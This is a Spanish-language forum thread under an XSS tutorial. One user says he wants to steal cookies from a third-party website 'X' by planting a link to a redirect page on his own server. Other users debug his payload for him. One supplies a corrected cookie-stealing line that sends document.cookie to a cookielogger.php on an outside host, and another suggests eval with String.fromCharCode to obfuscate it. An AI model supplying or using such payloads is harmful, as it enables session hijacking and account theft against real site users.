XSS - Mas allá del alert(); By: Tec-n0x

[perverthso]

muy bueno y creativo el tutorial felicitaciones

[er_davids]

Voy de problema en problema 

Gracias a el método de yeikos he conseguido que me cargue las funciones del javascript con letras. Vale os voy a explicar así un poco para que sepaís que pretendo hacer:

Tengo una web "X" a la que le quiero sacar la cookie. Como en el foro no puedo utilizar <script></script>, se me ocurrió poner un link a un servidor mío a una página "Y" que con un meta refresh redirija a la página "X" pero con el XSS ya introducido en la URL.

Vale hasta ahora bien, todo funciona perfectamente hasta que llega a la mitad del script:

document.location=http://miweb.com/cookielogger.php?cookie + document.cookie

Vale el document.location lo realiza correctamente porque me redirige a cookielogger.php pero la cookie no aparece por ningún lado. Le he puesto un print para comprobarlo y me aparace ==> document.cookie. La cookie sigue desaparecida x'D

También he probdo con document.location=http://miweb.com/cookielogger.php?cookie= document.cookie, pero nada me sigue apareciendo document.cookie en vez de la cookie.

Me he quemado ya la cabeza de tanto pensar en que puede fallar y no se qué es, haber si me podéis echar una mano. Se me ha ocurrido de que al irse a mi hosting al no haber cookie no me la muestre, pero como le hago el location al otro hosting sí debería de aparecer :S no se, estoy confuso :S

[Azielito]

por que lo toma como cadena, has uso de la funcion eval()

Código (javascript) [Seleccionar] Expandir

eval('document.location=http://miweb.com/cookielogger.php?cookie+document.cookie') o algo asi xD

[er_davids]

Gracias por la respuesta pero no me ha valido o no he sabido colocarlo 

Si queréis ver lo que sale el link de la web "trampa" que redirige está en www.pspandopower.com/prueba/index.php

Es una web de un hosting mio, por lo que estará permitido que lo ponga no?

[sirdarckcat]

no mams azielito eso está mal jaja
es..
document.location='http://miweb.com/cookielogger.php?cookie='+document.cookie
como tu dices saldrá error.

Saludos!!

[Azielito]

claro que esta mal xD


Creo que tendre que poner bien mis ejemplos de ahora en adelante, ya van com 3 que me corriges xDDD


bien...


Me refiero a que con la "funcion" que pones, lo ponga dentro del eval...
o sea (espero no equivocarme de nuevo xDDD)

Código (javascript) [Seleccionar] Expandir


eval(String.fromCharCode(97,108,101,114,116,40,39,104,111,108,97,39,41,59));


claro, con las instrucciones correspondientes